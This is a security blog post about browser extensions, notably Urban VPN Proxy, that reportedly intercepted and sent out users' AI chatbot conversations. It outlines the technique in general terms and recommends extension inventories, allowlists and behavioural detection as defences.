Stop Browser Extensions From Stealing AI Chat Data

8 million users is a lot of “oops.” That’s the scale researchers reported for Urban VPN Proxy and related browser extensions that captured and exfiltrated conversations from popular AI assistants—ChatGPT, Claude, Gemini, Copilot, Perplexity, DeepSeek, Grok, and Meta AI.

Most companies get this wrong: they treat AI chatbot usage as a policy problem (“don’t paste secrets”) when it’s increasingly an endpoint problem. If a browser extension can sit between the user and the chatbot and quietly siphon prompts and responses, training slides won’t save you.

This post breaks down what actually happened, why “marketplace approval” doesn’t mean safe, and the controls that reliably reduce risk—especially AI-driven behavioral analytics that spot unauthorized data harvesting even when it’s “technically disclosed.”

What happened: AI chat prompts became an exfiltration stream

The core issue is simple: a “privacy” extension behaved like a data collection agent.

Researchers at Koi Security reported that Urban VPN Proxy (and several sibling extensions from the same publisher) collected AI chatbot conversation data by default in newer versions. Crucially, the data collection ran whether the VPN feature was connected or not, and users didn’t get a clear in-product control to turn it off.

From a defender’s viewpoint, this is the nightmare scenario for AI adoption:

• Employees believe they’re using an AI assistant inside a normal browser session.
• The organization thinks risk is contained to the AI provider’s environment.
• A third party on the endpoint captures the full prompt/response stream—and ships it out.

Why AI chat data is more sensitive than teams assume

AI chatbot transcripts are unusually “dense” with sensitive material. People don’t just search; they confess.

In enterprise settings, prompts commonly include:

• Proprietary source code, configuration, and architecture diagrams
• Incident details and logs during active investigations
• Credentials pasted “just for a second” to debug
• Customer records, regulated data, or internal financials
• Legal drafts, HR issues, merger plans

The uncomfortable truth: AI chat has become a shadow system of record. If you don’t treat it like one, someone else will.

How the extension pulled it off (and why it’s hard to spot)

Answer first: it used a classic interception technique—injecting scripts into specific sites—and then captured network traffic before the browser rendered it.

According to the researchers’ description, the extension:

1. Monitored tabs to detect when a user visited a targeted AI platform.
2. Injected an “executor” script tailored for that platform.
3. Overrode fetch() and XMLHttpRequest, the browser APIs that handle web requests.
4. Captured prompts and responses by intercepting the raw API traffic.
5. Packaged and sent the data to remote endpoints associated with the vendor.

This matters because it avoids many naïve “privacy checks.” A user can review a chat UI and see nothing unusual. Even basic network monitoring may show traffic that looks like analytics. Meanwhile, the extension is effectively acting as a man-in-the-browser.

The signals defenders should care about

If you’re building detection logic (or evaluating tools that claim they can), this kind of behavior tends to generate a few measurable signals:

• Unexpected script injection into known SaaS domains (LLM chat apps)
• API interception patterns (wrapping web APIs, hooking request/response objects)
• Background service worker traffic to analytics/stat endpoints with compressed payloads
• High-frequency outbound calls that correlate with prompt submissions
• Cross-extension “family resemblance” (same publisher patterns, shared SDKs)

A human can’t reliably watch for these. Automation can.

“But it was in the privacy policy” isn’t a defense

Answer first: buried disclosure doesn’t equal informed consent, and it definitely doesn’t equal enterprise acceptability.

This incident exposes a gap between platform policy compliance and user expectations. Extensions can pass marketplace review, earn a “featured” badge, and still engage in data collection that would surprise most users—especially when the extension markets itself as privacy protection.

From a governance standpoint, I take a hard stance here: if an extension collects AI chat content, that behavior should be treated as high-risk by default, regardless of whether it’s disclosed.

Why? Because disclosure doesn’t change the impact:

• Chat transcripts can contain regulated data.
• The organization may have contractual obligations (confidentiality, DPAs).
• The captured content can be re-identified when combined with device identifiers and clickstream.

If you’re a security leader, this is also a procurement lesson: “free VPN” is often a business model, not a gift.

Where AI in cybersecurity fits: detect behavior, not badges

Answer first: the most practical way to stop this class of threat is endpoint monitoring + behavioral analytics, with AI used to flag abnormal data flows and suspicious extension behaviors.

In the “AI in Cybersecurity” series, we keep coming back to one theme: attackers (and data brokers) thrive in the gaps between tools. Browser extensions live in a gap where:

• EDR may not fully understand browser internals.
• Network controls may see “just HTTPS.”
• Marketplace trust signals create false confidence.

This is exactly where AI-driven detection helps—because it’s good at correlating weak signals across time.

What AI-driven detection can realistically catch

You don’t need magic. You need good telemetry and models that prioritize the right anomalies.

Effective detections often look like:

• Behavioral baselining: “This user’s browser doesn’t normally send compressed payloads to unknown analytics domains right after LLM prompts.”
• Sequence detection: “Visit LLM domain → injection event → hook APIs → background exfil.” That pattern is more meaningful than any single indicator.
• Publisher-level clustering: “Multiple extensions share code paths, endpoints, and permission sets.”
• Content-aware controls (where permitted): identify prompt-like payload structures leaving the endpoint, without storing the content.

AI isn’t replacing security controls here. It’s helping you find the needle faster.

The control stack that works (and what’s usually missing)

Most organizations already have pieces of this—but not connected.

A practical stack looks like:

1. Extension governance (prevent the risky install)
2. Secure enterprise browser controls (limit what extensions can do)
3. Endpoint telemetry + threat hunting (detect injection/exfil behavior)
4. Network egress control (block known bad destinations, restrict unknown)
5. AI usage guardrails (reduce the sensitivity of what’s entered)

In my experience, the missing piece is almost always #1. If employees can install whatever they want, everything else becomes cleanup.

A concrete response plan (do this next week, not “someday”)

Answer first: treat browser extensions that touch AI chat as a Tier-1 data risk, then reduce your exposure in three passes—inventory, control, detect.

1) Inventory: know what’s installed and where

Start with facts. Pull an extension inventory from managed browsers and endpoint tools, and segment by:

• Publisher
• Permissions (especially “read and change data on websites you visit”)
• Installation source (store vs sideload)
• User population (engineering, finance, support)

If you don’t have centralized browser management, this incident is your reason to get it.

2) Control: move to allowlists, not denylists

Denylists are whack-a-mole. Allowlists scale.

Set policy so that:

• Only approved extensions run on corporate profiles.
• VPN/proxy extensions are restricted to vetted vendors.
• AI assistants are accessed through managed browsers or managed profiles.

If you must allow some flexibility, consider a tiered model:

• Tier A: approved and monitored
• Tier B: allowed for low-risk roles only
• Tier C: blocked

3) Detect: watch for “AI chat interception” behaviors

Even with strong governance, assume something slips through.

Detection ideas that consistently pay off:

• Alerts on new extension installs or updates across the fleet
• Alerts on script injection events into known AI chatbot domains
• Outbound connections from browser processes to newly seen analytics/stat domains
• Data volume spikes correlated with chatbot use
• Long-running service worker activity that doesn’t match user actions

If you’re evaluating vendors, ask a blunt question: Can your product detect a browser extension overriding fetch() and exfiltrating chatbot API traffic? Show me how.

Common questions security teams are asking (and straight answers)

“Does a ‘featured’ marketplace badge mean it’s safe?”

No. It’s a trust signal, not a security guarantee. Behavior changes after updates; badges don’t prevent that.

“Is this only a consumer risk?”

No. Corporate devices are often the target because enterprise prompts are more valuable—source code, customer data, internal strategies.

“If we block one extension, are we covered?”

No. The pattern is the risk: extensions that can read/modify site data and intercept requests can be repurposed. You need governance plus detection.

“Should we ban AI chatbots?”

Bans push usage into personal devices and unmanaged browsers. A better approach is managed access + data controls + monitoring.

What this means for 2026 AI security programs

AI chatbot data theft is turning into a mainstream endpoint problem, and attackers don’t need zero-days to do it. They just need a distribution channel, a plausible store listing, and a permission set users click through.

If you’re building your 2026 roadmap, I’d prioritize two outcomes:

1. You can prove what browser extensions are running in your environment.
2. You can detect and stop abnormal data flows from AI chatbot interactions.

Those two capabilities won’t just prevent this specific incident. They’ll also harden you against the next wave: agentic workflows in the browser, AI copilots inside business apps, and more sensitive prompts moving through more endpoints.

If a tool claims to protect privacy while quietly shipping AI chat transcripts to third parties, the right response isn’t panic—it’s engineering. What would it take in your environment to catch that behavior within hours, not weeks?